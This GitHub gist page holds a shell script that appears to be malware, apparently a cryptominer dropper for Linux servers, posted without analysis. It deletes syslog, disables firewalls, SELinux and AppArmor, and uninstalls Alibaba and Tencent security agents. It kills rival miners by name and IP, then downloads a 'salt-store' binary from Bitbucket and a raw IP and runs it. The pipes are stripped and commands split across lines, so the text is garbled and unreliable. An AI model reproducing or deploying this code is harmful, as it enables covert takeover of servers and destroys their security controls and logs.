Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
/bin/sh
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
userdel akay
userdel vfinder
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
if ps aux
grep -i '[a]liyun'
curl http://update.aegis.aliyun.com/download/uninstall.sh
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux
grep -i '[y]unjing'
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
netstat -anp
grep 185.71.65.238
awk '{print $7}'
awk -F'[/]' '{print $1}'
xargs -I % kill -9 %
grep 140.82.52.87
grep :443
grep -v "-"
grep :23
grep :143
grep :2222
grep :3333
grep :3389
grep :4444
grep :5555
grep :6666
grep :6665
grep :6667
grep :7777
grep :8444
grep :3347
grep :14444
grep :14433
grep :13531
ps aux
grep "sleep 60"
grep -v grep
awk '{print $2}'
grep "./crun"
grep -vw salt-minions
awk '{if($3>80.0) print $2}'
grep ':3333'
grep ':5555'
grep 'kworker -c\'
grep 'log_'
grep 'systemten'
grep 'netns'
grep 'voltuned'
grep 'darwin'
grep '/tmp/dl'
grep '/tmp/ddg'
grep '/tmp/pprt'
grep '/tmp/ppol'
grep '/tmp/65ccE*'
grep '/tmp/jmx*'
grep '/tmp/2Ne80*'
grep 'IOFoqIgyC0zmf2UR'
grep '45.76.122.92'
grep '51.38.191.178'
grep '51.15.56.161'
grep '86s.jpg'
grep 'aGTSGJJp'
grep 'nMrfmnRa'
grep 'PuNY5tm2'
grep 'I0r8Jyyt'
grep 'AgdgACUD'
grep 'uiZvwxG8'
grep 'hahwNEdB'
grep 'BtwXn5qH'
grep '3XEzey2T'
grep 't2tKrCSZ'
grep 'HD7fcBgg'
grep 'zXcDajSs'
grep '3lmigMo'
grep 'AkMK4A2'
grep 'AJ2AkKe'
grep 'HiPxCJRS'
grep 'http_0xCC030'
grep 'http_0xCC031'
grep 'http_0xCC032'
grep 'http_0xCC033'
grep "C4iLM4L"
grep 'aziplcr72qjhzvin'
awk '{ if(substr($11,1,2)=="./"
substr($12,1,2)=="./") print $2 }'
grep '/boot/vmlinuz'
grep "i4b503a52cc5"
grep "dgqtrcst23rtdi3ldqk322j2"
grep "2g0uv7npuhrlatd"
grep "nqscheduler"
grep "rkebbwgqpl4npmm"
grep -v aux
grep "]"
awk '$3>10.0{print $2}'
grep "2fhtu70teuhtoh78jc5s"
grep "0kwti6ut420t"
grep "44ct7udt0patws3agkdfqnjm"
grep -v "/"
grep -v "_"
awk 'length($11)>19{print $2}'
grep "\[
grep "rsync"
grep "watchd0g"
egrep 'wnTKYg
qW3xT.2
grep "158.69.133.18:8220"
grep "/tmp/java"
grep 'gitee.com'
grep '/tmp/java'
grep '104.248.4.162'
grep '89.35.39.78'
grep '/dev/shm/z3.sh'
grep 'kthrotlds'
grep 'ksoftirqds'
grep 'netdns'
grep 'watchdogs'
grep -v root
grep -v dblaunch
grep -v dblaunchs
grep -v dblaunched
grep -v apache2
grep -v atd
grep -v salt-minions
awk '$3>80.0{print $2}'
grep " ps"
grep "sync_supers"
cut -c 9-15
grep "cpuset"
grep "x]"
grep "sh] <"
grep " \[]"
grep '/tmp/l.sh'
grep '/tmp/zmcat'
grep 'CnzFVPLF'
grep 'CvKzzZLs'
grep '/tmp/udevd'
grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA'
grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo'
grep 'sustse'
grep 'sustse3'
grep 'mr.sh'
grep 'wget'
grep 'curl'
grep '2mr.sh'
grep 'cr5.sh'
grep 'logo9.jpg'
grep 'j2.conf'
grep 'luk-cpu'
grep 'ficov'
grep 'he.sh'
grep 'miner.sh'
grep 'nullcrew'
grep '107.174.47.156'
grep '83.220.169.247'
grep '51.38.203.146'
grep '144.217.45.45'
grep '107.174.47.181'
grep '176.31.6.16'
ps auxf
grep "mine.moneropool.com"
grep "pool.t00ls.ru"
grep "xmr.crypto-pool.fr:8080"
grep "xmr.crypto-pool.fr:3333"
grep "zhuabcn@yahoo.com"
grep "monerohash.com"
grep "/tmp/a7b104c270"
grep "xmr.crypto-pool.fr:6666"
grep "xmr.crypto-pool.fr:7777"
grep "xmr.crypto-pool.fr:443"
grep "stratum.f2pool.com:8888"
grep "xmrpool.eu"
grep xiaoyao
grep xiaoxue
netstat -antp
grep '46.243.253.15'
grep 'ESTABLISHED\
SYN_SENT'
sed -e "s/\/.*//g"
grep '108.174.197.76'
grep '192.236.161.6'
grep '88.99.242.92'
pkill -f pastebin
pkill -f 185.193.127.115
pgrep -f monerohash
pgrep -f L2Jpbi9iYXN
pgrep -f xzpauectgr
pgrep -f slxfbkmxtd
pgrep -f mixtape
pgrep -f addnj
pgrep -f 200.68.17.196
pgrep -f IyEvYmluL3NoCgpzUG
pgrep -f KHdnZXQgLXFPLSBodHRw
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
pgrep -f mwyumwdbpq.conf
pgrep -f honvbsasbf.conf
pgrep -f mqdsflm.cf
pgrep -f stratum
pgrep -f lower.sh
pgrep -f ./ppp
pgrep -f cryptonight
pgrep -f ./seervceaess
pgrep -f ./servceaess
pgrep -f ./servceas
pgrep -f ./servcesa
pgrep -f ./vsp
pgrep -f ./jvs
pgrep -f ./pvv
pgrep -f ./vpp
pgrep -f ./pces
pgrep -f ./rspce
pgrep -f ./haveged
pgrep -f ./jiba
pgrep -f ./watchbog
pgrep -f ./A7mA5gb
pgrep -f kacpi_svc
pgrep -f kswap_svc
pgrep -f kauditd_svc
pgrep -f kpsmoused_svc
pgrep -f kseriod_svc
pgrep -f kthreadd_svc
pgrep -f ksoftirqd_svc
pgrep -f kintegrityd_svc
pgrep -f jawa
pgrep -f oracle.jpg
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
pgrep -f 188.209.49.54
pgrep -f 181.214.87.241
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
pgrep -f servim
pgrep -f kblockd_svc
pgrep -f native_svc
pgrep -f ynn
pgrep -f 65ccEJ7
pgrep -f jmxx
pgrep -f 2Ne80nA
pgrep -f sysstats
pgrep -f systemxlv
pgrep -f watchbog
pgrep -f OIcJi1m
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f nanoWatch
pkill -f zigw
pkill -f devtool
pkill -f devtools
pkill -f systemctI
pkill -f watchbog
pkill -f sustes
pkill -f xmrig
pkill -f xmrig-cpu
pkill -f 121.42.151.137
pkill -f sysguard
pkill -f networkservice
pkill -f sysupdate
pkill -f init12.cfg
pkill -f nginxk
pkill -f tmp/wc.conf
pkill -f xmrig-notls
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru
pkill -f dbus-daemon--system
pkill -f nullcrew
pkill -f kworkerds
pkill -f init10.cfg
pkill -f /wl.conf
pkill -f crond64
pkill -f sustse
pkill -f vmlinuz
pkill -f exin
pkill -f apachiii
rm -rf /usr/bin/config.json
rm -rf /usr/bin/exin
killall log_rot
pkill -f log_rot
rm -rf /tmp/wc.conf
rm -rf /tmp/log_rot
rm -rf /tmp/apachiii
rm -rf /tmp/sustse
rm -rf /tmp/php
rm -rf /tmp/p2.conf
rm -rf /tmp/pprt
rm -rf /tmp/ppol
rm -rf /tmp/javax/config.sh
rm -rf /tmp/javax/sshd2
rm -rf /tmp/.profile
rm -rf /tmp/1.so
rm -rf /tmp/kworkerds
rm -rf /tmp/kworkerds3
rm -rf /tmp/kworkerdssx
rm -rf /tmp/xd.json
rm -rf /tmp/syslogd
rm -rf /tmp/syslogdb
rm -rf /tmp/65ccEJ7
rm -rf /tmp/jmxx
rm -rf /tmp/2Ne80nA
rm -rf /tmp/dl
rm -rf /tmp/ddg
rm -rf /tmp/systemxlv
rm -rf /tmp/systemctI
rm -rf /tmp/.abc
rm -rf /tmp/osw.hb
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/.java
rm -rf /tmp/.omed
rm -rf /tmp/.tmpc
rm -rf /tmp/gates.lod
rm -rf /tmp/conf.n
rm -rf /tmp/update.sh
rm -rf /tmp/devtool
rm -rf /tmp/devtools
rm -rf /tmp/fs
rm -rf /tmp/.rod
rm -rf /tmp/.rod.tgz
rm -rf /tmp/.rod.tgz.1
rm -rf /tmp/.rod.tgz.2
rm -rf /tmp/.mer
rm -rf /tmp/.mer.tgz
rm -rf /tmp/.mer.tgz.1
rm -rf /tmp/.hod
rm -rf /tmp/.hod.tgz
rm -rf /tmp/.hod.tgz.1
rm -rf /tmp/84Onmce
rm -rf /tmp/C4iLM4L
rm -rf /tmp/lilpip
rm -rf /tmp/3lmigMo
rm -rf /tmp/am8jmBP
rm -rf /tmp/tmp.txt
rm -rf /tmp/baby
rm -rf /tmp/.lib
rm -rf /tmp/systemd
rm -rf /tmp/lib.tar.gz
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.mynews1234
rm -rf /tmp/a3e12d
rm -rf /tmp/.pt
rm -rf /tmp/.pt.tgz
rm -rf /tmp/.pt.tgz.1
rm -rf /tmp/go
rm -rf /tmp/.tmpnewasss
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
rm -rf /tmp/khugepageds
rm -rf /tmp/.censusqqqqqqqqq
rm -rf /tmp/.kerberods
rm -rf /tmp/kerberods
rm -rf /tmp/seasame
rm -rf /tmp/touch
rm -rf /tmp/.p
rm -rf /tmp/runtime2.sh
rm -rf /tmp/runtime.sh
rm -rf /dev/shm/z3.sh
rm -rf /dev/shm/z2.sh
rm -rf /dev/shm/.scr
rm -rf /dev/shm/.kerberods
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
rm -rf /tmp/watchdogs
rm -rf /etc/cron.d/tomcat
rm -rf /etc/rc.d/init.d/watchdogs
rm -rf /usr/sbin/watchdogs
rm -f /tmp/kthrotlds
rm -f /etc/rc.d/init.d/kthrotlds
rm -rf /tmp/.sysbabyuuuuu12
rm -rf /tmp/logo9.jpg
rm -rf /tmp/miner.sh
rm -rf /tmp/nullcrew
rm -rf /tmp/proc
rm -rf /tmp/2.sh
rm /opt/atlassian/confluence/bin/1.sh
rm /opt/atlassian/confluence/bin/1.sh.1
rm /opt/atlassian/confluence/bin/1.sh.2
rm /opt/atlassian/confluence/bin/1.sh.3
rm /opt/atlassian/confluence/bin/3.sh
rm /opt/atlassian/confluence/bin/3.sh.1
rm /opt/atlassian/confluence/bin/3.sh.2
rm /opt/atlassian/confluence/bin/3.sh.3
rm -rf /var/tmp/f41
rm -rf /var/tmp/2.sh
rm -rf /var/tmp/config.json
rm -rf /var/tmp/xmrig
rm -rf /var/tmp/1.so
rm -rf /var/tmp/kworkerds3
rm -rf /var/tmp/kworkerdssx
rm -rf /var/tmp/kworkerds
rm -rf /var/tmp/wc.conf
rm -rf /var/tmp/nadezhda.
rm -rf /var/tmp/nadezhda.arm
rm -rf /var/tmp/nadezhda.arm.1
rm -rf /var/tmp/nadezhda.arm.2
rm -rf /var/tmp/nadezhda.x86_64
rm -rf /var/tmp/nadezhda.x86_64.1
rm -rf /var/tmp/nadezhda.x86_64.2
rm -rf /var/tmp/sustse3
rm -rf /var/tmp/sustse
rm -rf /var/tmp/moneroocean/
rm -rf /var/tmp/devtool
rm -rf /var/tmp/devtools
rm -rf /var/tmp/play.sh
rm -rf /var/tmp/systemctI
rm -rf /var/tmp/update.sh
rm -rf /var/tmp/.java
rm -rf /var/tmp/1.sh
rm -rf /var/tmp/conf.n
rm -r /var/tmp/lib
rm -r /var/tmp/.lib
rm -rf /tmp/config.json
chattr -iau /tmp/lok
chmod +700 /tmp/lok
rm -rf /tmp/lok
yum install -y docker.io
apt-get install docker.io
docker ps
grep "pocosow"
awk '{print $1}'
xargs -I % docker kill %
grep "gakeaws"
grep "azulu"
grep "auto"
grep "xmr"
grep "mine"
grep "monero"
grep "slowhttp"
grep "bash.shell"
grep "entrypoint.sh"
grep "/var/sbin/bash"
docker images -a
awk '{print $3}'
xargs -I % docker rmi -f %
grep "buster-slim"
grep "hello-"
grep "registry"
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
grep 'aegis'
grep 'Yun'
rm -rf /usr/local/aegis
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]
LDR="curl"
if [ -s /usr/bin/wget ]
WGET="wget -O"
WGET="curl -o"
DIR="/tmp"
if [ -e "/tmp/salt-store" ]
if [ -w "/tmp/salt-store" ]
-d "/tmp/salt-store" ]
if [ -x "$(command -v md5sum)" ]
sum=$(md5sum /tmp/salt-store
awk '{ print $1 }')
echo $sum
case $sum in
8ec3385e20d6d9a88bc95831783beaeb)
echo "salt-store OK"
*)
echo "salt-store wrong"
rm -rf /tmp/salt-store
sleep 1
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
if [ -d "/var/tmp" ]
DIR="/var/tmp"
echo "P NOT EXISTS"
download() {
sum=$(md5sum $DIR/salt-store
download2
echo "No md5sum"
download2() {
$WGET $DIR/salt-store https://bitbucket.org/samk12dd/git/raw/master/salt-store
chmod +x $DIR/salt-store
download3
download3() {
$WGET $DIR/salt-store http://217.12.210.192/salt-store
download
SKL=sa $DIR/salt-store
crontab -l
sed '/update.sh/d'
crontab -
sed '/logo4/d'
sed '/logo9/d'
sed '/logo0/d'
sed '/logo/d'
sed '/tor2web/d'
sed '/jpg/d'
sed '/png/d'
sed '/tmp/d'
sed '/zmreplchkr/d'
sed '/aliyun.one/d'
sed '/3.215.110.66.one/d'
sed '/pastebin/d'
sed '/onion/d'
sed '/lsd.systemten.org/d'
sed '/shuf/d'
sed '/ash/d'
sed '/mr.sh/d'
sed '/185.181.10.234/d'
sed '/localhost.xyz/d'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment